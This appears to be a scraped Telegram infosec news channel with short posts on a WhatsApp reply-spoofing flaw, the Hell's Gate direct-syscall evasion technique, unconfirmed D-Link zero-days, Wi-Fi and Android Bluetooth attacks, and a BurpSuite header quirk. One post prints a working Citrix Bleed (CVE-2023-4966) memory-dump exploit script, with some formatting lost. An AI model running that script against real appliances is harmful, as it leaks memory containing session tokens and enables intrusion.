cKure Red
2.39K subscribers
70 photos
34 videos
21 files
449 links
The director's cut on critical feeds from InfoSec world 🌎

Main Channel: @cKure

☕️ or queries email us
📨 i@ckure.org
Download Telegram
Whatsapp Spoofing impersonate of reply message

All official WhatsApp clients, upon receiving a "Message Reply" payload (QuotedMessage), do not validate whether the "ContextInfo" of this "QuotedMessage" is valid/exists ("StanzaId" and "Participant"). This allows a malicious actor to send in private chats or groups a "QuotedMessage" of a message that never existed on behalf of another person. This is highly critical and dangerous.

https://github.com/lichti/whats-spoofing

PoC: https://youtu.be/_WL6hpAvNh8
Exploring Hell's Gate.

Hell's Gate makes it possible to execute direct syscalls based on dynamically retrieving the required SSNs via a combination of walking the Process Environment Block (PEB), parsing the Export Address Table (EAT) from ntdll.dll, opcode comparison from the syscall stub of the native functions and extracting the SSNs.


https://redops.at/en/blog/exploring-hells-gate
Citrix Bleed Zero-Day CVE-2023-4966 by AssetNote team.

#!/usr/bin/env python3

import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g.
192.168.1.200)')
args = parser.parse_args()

if
args.target is None:
print('Target must be provided (e.g. --target
192.168.1.200)')
sys.exit(0)

hostname =
args.target

if name == "main":
headers = {
"Host": "a"*24576
}
r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
if r.status_code == 200:
print("--- Dumped Memory ---")
print(r.text[131050:])
print("--- End ---")
else:
print("Could not dump memory")
A series of critical zero-day vulnerabilities (approximately 3 issues) have been detected by a security researcher in D-Link devices / CPEs.

As per reports; most or all devices are vulnerable and system access can be achieved.

@ckuRED could not confirm independently.
cKure Red pinned «● A series of critical zero-day vulnerabilities (approximately 3 issues) have been detected by a security researcher in D-Link devices / CPEs. As per reports; most or all devices are vulnerable and system access can be achieved. @ckuRED could not confirm…»
Bypassing Wi-Fi Encryption by Manipulating Transmit Queues.

https://www.usenix.org/system/files/usenixsecurity23-schepers.pdf
cKure Red pinned «Zero-Day (via CVE-2023-45866): Exploiting Zero-click Android Bluetooth vulnerability to inject keystrokes without pairing. https://www.mobile-hacker.com/2024/01/23/exploiting-0-click-android-bluetooth-vulnerability-to-inject-keystrokes-without-pairing/»
BurpSuite's chromium browser adds a header as it sends the request across to the server.

Sec-Ua*

I found it when one website blocked my requests for a normal login (with a 302 redirect to WAF's soft error). This is over a half year old story. Thought of sharing.